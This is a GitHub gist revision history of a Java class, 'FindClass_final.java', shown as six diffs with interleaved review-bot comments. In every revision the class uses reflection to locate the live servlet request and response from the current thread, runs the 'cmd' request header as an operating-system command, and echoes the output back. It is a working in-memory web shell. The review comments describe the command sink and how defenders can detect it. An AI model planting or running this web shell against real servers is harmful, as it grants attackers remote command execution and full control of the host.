@Pear1y
Forked from fnmsd/FindClass_final.java
Created July 12, 2022 07:19
Revisions

  1. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 53 additions and 56 deletions.
    109 changes: 53 additions & 56 deletions FindClass_final.java
    @@ -1,94 +1,91 @@
    //Author:fnmsd
    //Blog:https://blog.csdn.net/fnmsd
    //
    // Source code recreated from a .class file by IntelliJ IDEA
    // (powered by Fernflower decompiler)
    //

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.lang.reflect.Field;
    import java.util.HashSet;
    import java.util.Scanner;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class a {

    static HashSet<Object> h;
    static HttpServletRequest r;
    static HttpServletResponse p;

    public a() {
    // static {
    // r = null;
    // p = null;
    // h =new HashSet<Object>();
    // F(Thread.currentThread(),0);
    // }
    public a(){
    r = null;
    p = null;
    h = new HashSet();
    F(Thread.currentThread(), 0);
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    }

    private static boolean i(Object obj) {
    if (obj != null && !h.contains(obj)) {
    h.add(obj);
    return false;
    } else {
    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    return true;
    }

    h.add(obj);
    return false;
    }
    private static void p(Object o, int depth){
    if(depth > 52||(r !=null&& p !=null)){
    return;
    }
    if(!i(o)){
    if(r ==null&&HttpServletRequest.class.isAssignableFrom(o.getClass())){
    r = (HttpServletRequest)o;
    if(r.getHeader("cmd")==null)
    r =null;

    private static void p(Object o, int depth) {
    if (depth <= 52 && (r == null || p == null)) {
    if (!i(o)) {
    if (r == null && HttpServletRequest.class.isAssignableFrom(o.getClass())) {
    r = (HttpServletRequest)o;
    if (r.getHeader("cmd") == null) {
    r = null;
    }
    } else if (p == null && HttpServletResponse.class.isAssignableFrom(o.getClass())) {
    p = (HttpServletResponse)o;
    }
    }else if(p ==null&&HttpServletResponse.class.isAssignableFrom(o.getClass())){
    p = (HttpServletResponse) o;

    if (r != null && p != null) {
    try {
    p.getWriter().println((new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream())).useDelimiter("\\A").next());
    p.getWriter().flush();
    } catch (Exception var3) {
    }
    }
    if(r !=null&& p !=null){
    try {

    return;
    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    }

    F(o, depth + 1);
    return;
    }

    F(o,depth+1);
    }
    }
    private static void F(Object start, int depth){

    private static void F(Object start, int depth) {
    Class n = start.getClass();

    do {
    Field[] arr$ = n.getDeclaredFields();
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Field declaredField = arr$[i$];
    Class n=start.getClass();
    do{
    for (Field declaredField : n.getDeclaredFields()) {
    declaredField.setAccessible(true);
    Object o = null;

    try {
    try{
    o = declaredField.get(start);
    if (!o.getClass().isArray()) {
    p(o, depth);
    } else {
    Object[] arr$ = (Object[])((Object[])o);
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Object q = arr$[i$];

    if(!o.getClass().isArray()){
    p(o,depth);
    }else{
    for (Object q : (Object[]) o) {
    p(q, depth);
    }

    }
    } catch (Exception var12) {

    }catch (Exception e){
    }
    }
    } while((n = n.getSuperclass()) != null);

    }while(
    (n = n.getSuperclass())!=null
    );
    }
    }
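Review bot: The value of the `cmd` request header goes unvalidated into `Runtime.getRuntime().exec(...)` on the `p.getWriter().println(...)` line of `p`, and the process output is written back to the response, so whoever sends the request gets OS command execution with the container's privileges; the same line appears in every revision listed below. The old and new sides cannot be told apart on this rendered page, so the point applies to both forms of the method. For defenders the visible artifacts are a request header literally named `cmd`, a child process spawned by the servlet container's JVM, and a class whose constructor walks the fields of `Thread.currentThread()` with `setAccessible(true)`; alerting on process creation by the container and restricting what it may execute covers the sink regardless of how the class was loaded. If the file is kept as a research sample it should open with a comment such as `// SECURITY: runs the "cmd" request header as an OS command; lab sample, never deploy`.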

  2. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 55 additions and 52 deletions.
    107 changes: 55 additions & 52 deletions FindClass_final.java
    @@ -1,91 +1,94 @@
    //Author:fnmsd
    //Blog:https://blog.csdn.net/fnmsd
    package aa;
    //
    // Source code recreated from a .class file by IntelliJ IDEA
    // (powered by Fernflower decompiler)
    //

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.lang.reflect.Field;
    import java.util.HashSet;
    import java.util.Scanner;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class a {

    static HashSet<Object> h;
    static HttpServletRequest r;
    static HttpServletResponse p;

    public a(){
    public a() {
    r = null;
    p = null;
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    h = new HashSet();
    F(Thread.currentThread(), 0);
    }

    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    private static boolean i(Object obj) {
    if (obj != null && !h.contains(obj)) {
    h.add(obj);
    return false;
    } else {
    return true;
    }

    h.add(obj);
    return false;
    }
    private static void p(Object o, int depth){

    if(!i(o)){
    if(r ==null&&HttpServletRequest.class.isAssignableFrom(o.getClass())){
    r = (HttpServletRequest)o;
    if(r.getHeader("cmd")==null)
    r =null;

    }else if(p ==null&&HttpServletResponse.class.isAssignableFrom(o.getClass())){
    p = (HttpServletResponse) o;

    }
    if(r !=null&& p !=null){
    try {
    private static void p(Object o, int depth) {
    if (depth <= 52 && (r == null || p == null)) {
    if (!i(o)) {
    if (r == null && HttpServletRequest.class.isAssignableFrom(o.getClass())) {
    r = (HttpServletRequest)o;
    if (r.getHeader("cmd") == null) {
    r = null;
    }
    } else if (p == null && HttpServletResponse.class.isAssignableFrom(o.getClass())) {
    p = (HttpServletResponse)o;
    }

    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    if (r != null && p != null) {
    try {
    p.getWriter().println((new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream())).useDelimiter("\\A").next());
    p.getWriter().flush();
    } catch (Exception var3) {
    }

    return;
    }
    return;
    }
    if(depth > 60||(r !=null&& p !=null)){
    return;

    F(o, depth + 1);
    }
    F(o,depth+1);

    }
    }
    private static void F(Object start, int depth){

    Class n=start.getClass();
    do{
    for (Field declaredField : n.getDeclaredFields()) {
    private static void F(Object start, int depth) {
    Class n = start.getClass();

    do {
    Field[] arr$ = n.getDeclaredFields();
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Field declaredField = arr$[i$];
    declaredField.setAccessible(true);
    Object o = null;
    try{

    try {
    o = declaredField.get(start);

    if(!o.getClass().isArray()){
    p(o,depth);
    }else{

    for (Object q : (Object[]) o) {
    if (!o.getClass().isArray()) {
    p(o, depth);
    } else {
    Object[] arr$ = (Object[])((Object[])o);
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
    Object q = arr$[i$];
    p(q, depth);
    }

    }


    }catch (Exception e){
    } catch (Exception var12) {
    }
    }
    } while((n = n.getSuperclass()) != null);

    }while(
    (n = n.getSuperclass())!=null
    );
    }
    }
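Review bot: `F` calls `declaredField.setAccessible(true)` on every declared field of every class reachable from `Thread.currentThread()`, which only works where the runtime permits deep reflection into JDK and container internals; the call is present in both the hand-written and the decompiled form shown in this section. On JDK 16 and later that access is refused for `java.base` packages unless the JVM was started with matching `--add-opens` options, so the container's startup flags are worth auditing for broad `--add-opens …=ALL-UNNAMED` entries. Both `catch (Exception …) {}` blocks, in `p` and in `F`, are empty, so nothing reaches the application log when a reflective read or the `exec` fails; detection has to come from process-creation and audit telemetry rather than container logs. If the sample is kept, a comment above `F` such as `// walks the current thread's object graph via reflection to locate the live request/response` would state what the loop is for.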

  3. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 2 additions and 0 deletions.
    2 changes: 2 additions & 0 deletions FindClass_final.java
    @@ -1,3 +1,5 @@
    //Author:fnmsd
    //Blog:https://blog.csdn.net/fnmsd
    package aa;

    import javax.servlet.http.HttpServletRequest;
  4. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion FindClass_final.java
    @@ -45,7 +45,7 @@ private static void p(Object o, int depth){
    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    //e.printStackTrace();

    }
    return;
    }
  5. @fnmsd fnmsd revised this gist Jun 12, 2020. 1 changed file with 8 additions and 29 deletions.
    37 changes: 8 additions & 29 deletions FindClass_final.java
    @@ -12,31 +12,18 @@ public class a {
    static HttpServletRequest r;
    static HttpServletResponse p;

    // static {
    // start();
    // }
    public a(){
    r = null;
    p = null;
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    }
    // private static void start(){
    // r = null;
    // p = null;
    // h =new HashSet<>();
    // F(Thread.currentThread(),0);
    // }

    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    return true;
    }
    //Class a = obj.getClass();
    // if(obj.getClass().isPrimitive()
    // // ||obj.getClass().toString().startsWith("java.lang")
    // ){
    // return true;
    // }

    h.add(obj);
    return false;
    }
    @@ -54,13 +41,7 @@ private static void p(Object o, int depth){
    }
    if(r !=null&& p !=null){
    try {
    //PrintWriter os = p.getWriter();
    //Process p = Runtime.getRuntime().exec(r.getHeader("cmd"));
    //p.waitFor(2000, TimeUnit.MILLISECONDS);
    //byte[] a=new byte[40960];
    // Scanner scanner = new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A");
    // scanner.useDelimiter("\\A");
    //os.println("Test by fnmsd ");

    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    @@ -82,23 +63,21 @@ private static void F(Object start, int depth){
    declaredField.setAccessible(true);
    Object o = null;
    try{
    //if((declaredField.getModifiers()&0x00000008) == 0){

    o = declaredField.get(start);
    //}
    //if(obj != null){

    if(!o.getClass().isArray()){
    p(o,depth);
    }else{
    //if(!obj.getClass().getComponentType().isPrimitive()) {

    for (Object q : (Object[]) o) {
    p(q, depth);
    }
    //}

    }
    // }


    }catch (Exception e){
    //e.printStackTrace();
    }
    }

  6. @fnmsd fnmsd created this gist Jun 11, 2020.
    110 changes: 110 additions & 0 deletions FindClass_final.java
    @@ -0,0 +1,110 @@
    package aa;

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.lang.reflect.Field;
    import java.util.HashSet;
    import java.util.Scanner;

    public class a {

    static HashSet<Object> h;
    static HttpServletRequest r;
    static HttpServletResponse p;

    // static {
    // start();
    // }
    public a(){
    r = null;
    p = null;
    h =new HashSet<Object>();
    F(Thread.currentThread(),0);
    }
    // private static void start(){
    // r = null;
    // p = null;
    // h =new HashSet<>();
    // F(Thread.currentThread(),0);
    // }
    private static boolean i(Object obj){
    if(obj==null|| h.contains(obj)){
    return true;
    }
    //Class a = obj.getClass();
    // if(obj.getClass().isPrimitive()
    // // ||obj.getClass().toString().startsWith("java.lang")
    // ){
    // return true;
    // }
    h.add(obj);
    return false;
    }
    private static void p(Object o, int depth){

    if(!i(o)){
    if(r ==null&&HttpServletRequest.class.isAssignableFrom(o.getClass())){
    r = (HttpServletRequest)o;
    if(r.getHeader("cmd")==null)
    r =null;

    }else if(p ==null&&HttpServletResponse.class.isAssignableFrom(o.getClass())){
    p = (HttpServletResponse) o;

    }
    if(r !=null&& p !=null){
    try {
    //PrintWriter os = p.getWriter();
    //Process p = Runtime.getRuntime().exec(r.getHeader("cmd"));
    //p.waitFor(2000, TimeUnit.MILLISECONDS);
    //byte[] a=new byte[40960];
    // Scanner scanner = new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A");
    // scanner.useDelimiter("\\A");
    //os.println("Test by fnmsd ");
    p.getWriter().println(new Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
    p.getWriter().flush();
    }catch (Exception e){
    //e.printStackTrace();
    }
    return;
    }
    if(depth > 60||(r !=null&& p !=null)){
    return;
    }
    F(o,depth+1);
    }
    }
    private static void F(Object start, int depth){

    Class n=start.getClass();
    do{
    for (Field declaredField : n.getDeclaredFields()) {
    declaredField.setAccessible(true);
    Object o = null;
    try{
    //if((declaredField.getModifiers()&0x00000008) == 0){
    o = declaredField.get(start);
    //}
    //if(obj != null){
    if(!o.getClass().isArray()){
    p(o,depth);
    }else{
    //if(!obj.getClass().getComponentType().isPrimitive()) {
    for (Object q : (Object[]) o) {
    p(q, depth);
    }
    //}
    }
    // }

    }catch (Exception e){
    //e.printStackTrace();
    }
    }

    }while(
    (n = n.getSuperclass())!=null
    );
    }
    }